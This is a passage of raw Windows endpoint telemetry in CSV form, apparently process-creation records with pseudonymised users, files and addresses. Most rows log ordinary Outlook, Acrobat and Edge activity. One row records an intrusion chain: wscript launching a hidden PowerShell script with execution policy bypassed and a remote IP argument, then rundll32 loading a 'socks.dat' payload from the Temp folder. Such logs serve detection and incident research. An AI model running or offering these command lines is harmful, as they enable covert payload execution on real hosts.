03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:53:49.680928500+00:00,2021-06-23 03:54:03.991424400+00:00,1e653379-0dd2-46fe-b666-9811f0d42c2c,computerpii_0a470890c60768167990033d701e7bd881398861,162138,False,10.7740.19041.1052,False,11540474045173177,,11540474045173280,2021-06-23 03:31:13.489936600+00:00,12940,2021-06-23 03:31:13.489936600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12940,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1029,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:53:55.183140300+00:00,8848,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_6ab3465d79cc85598aa105e2a64dc7f40091f2ad.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:53:55.416908200+00:00,2021-06-23 03:54:03.998687200+00:00,bc92977e-91b8-4ec7-82f4-bdf75c65402b,computerpii_0a470890c60768167990033d701e7bd881398861,162157,False,10.7740.19041.1052,False,11540474045171845,,11540474045173282,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,2176,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1030,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:43:06.596883700+00:00,16940,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:52.923514800+00:00,19636,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 408222891",False,2021-06-25 00:39:33.596717600+00:00,13452,wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:43:07.448175800+00:00,2021-06-25 00:45:13.405977100+00:00,4725fd46-120a-41e3-adae-437cfd85b808,computerpii_0a470890c60768167990033d701e7bd881398861,181645,False,10.7740.19041.1052,False,11540474045178362,,11540474045178371,2021-06-25 00:41:52.923514800+00:00,19636,2021-06-25 00:41:52.923514800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,19636,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-25 00:41:52.922603800+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+1031,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:23.237185400+00:00,21404,msedge.exe,"""msedge.exe"" --type=gpu-process --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:30.097950400+00:00,2021-06-25 00:41:46.342912800+00:00,1328f91b-a748-4f8c-99f9-aa2bf97c5174,computerpii_0a470890c60768167990033d701e7bd881398861,181231,False,10.7740.19041.1052,False,11540474045178212,,11540474045178220,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1032,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:23.252426400+00:00,3692,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:30.109150+00:00,2021-06-25 00:41:46.342992900+00:00,ec0913fd-138a-47e7-a7ce-30d8e96879ba,computerpii_0a470890c60768167990033d701e7bd881398861,181233,False,10.7740.19041.1052,False,11540474045178212,,11540474045178221,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1033,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:23.328033600+00:00,4152,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:30.188518+00:00,2021-06-25 00:41:46.343036200+00:00,9972c8fd-88db-4f67-a18c-53747dd9a28f,computerpii_0a470890c60768167990033d701e7bd881398861,181234,False,10.7740.19041.1052,False,11540474045178212,,11540474045178222,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1034,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:23.359305100+00:00,14624,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3012 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:30.200195200+00:00,2021-06-25 00:41:46.343079300+00:00,25156021-e0b9-4087-9896-7c93f253ffa2,computerpii_0a470890c60768167990033d701e7bd881398861,181235,False,10.7740.19041.1052,False,11540474045178212,,11540474045178223,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1035,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:23.508177200+00:00,14196,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:30.480136400+00:00,2021-06-25 00:41:46.343124200+00:00,966fb811-78ed-48b2-a5c1-97d0be0759a9,computerpii_0a470890c60768167990033d701e7bd881398861,181236,False,10.7740.19041.1052,False,11540474045178212,,11540474045178225,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1036,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:23.521624200+00:00,1408,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:30.480792900+00:00,2021-06-25 00:41:46.343167600+00:00,589ed520-25c5-4e9c-bf42-77b761247f25,computerpii_0a470890c60768167990033d701e7bd881398861,181237,False,10.7740.19041.1052,False,11540474045178212,,11540474045178226,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1037,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:25.353511900+00:00,2928,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.3192c70b6ac98f93 > \\.\pipe\chrome.nativeMessaging.out.3192c70b6ac98f93",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.714421800+00:00,1236,chrome.exe,"""chrome.exe"" ",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:31.232073300+00:00,2021-06-25 00:41:46.343689100+00:00,e7b58533-12bc-4b00-8e47-917519864201,computerpii_0a470890c60768167990033d701e7bd881398861,181249,False,10.7740.19041.1052,False,11540474045178214,,11540474045178239,2021-06-25 00:39:22.714421800+00:00,1236,2021-06-25 00:39:22.714421800+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,1236,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-25 00:39:22.795053700+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Google LLC,Google 